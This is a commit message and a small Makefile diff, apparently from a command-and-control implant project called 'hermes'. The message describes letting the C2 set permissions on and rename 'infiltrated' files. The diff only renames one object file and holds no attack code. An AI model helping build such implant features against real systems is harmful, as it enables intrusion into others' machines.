Allow c2 to set permissions to infiltrated file and change files names

--- a/hermes/Makefile
+++ b/hermes/Makefile
@@ -1,7 +1,7 @@
 CC=gcc
 
-agent: main.o actions.o c2_prot.o
-	$(CC) -o agent main.o actions.o c2_prot.o
+agent: main.o commands.o c2_prot.o
+	$(CC) -o agent main.o commands.o c2_prot.o
 
 clean:
 	rm -f agent *.o
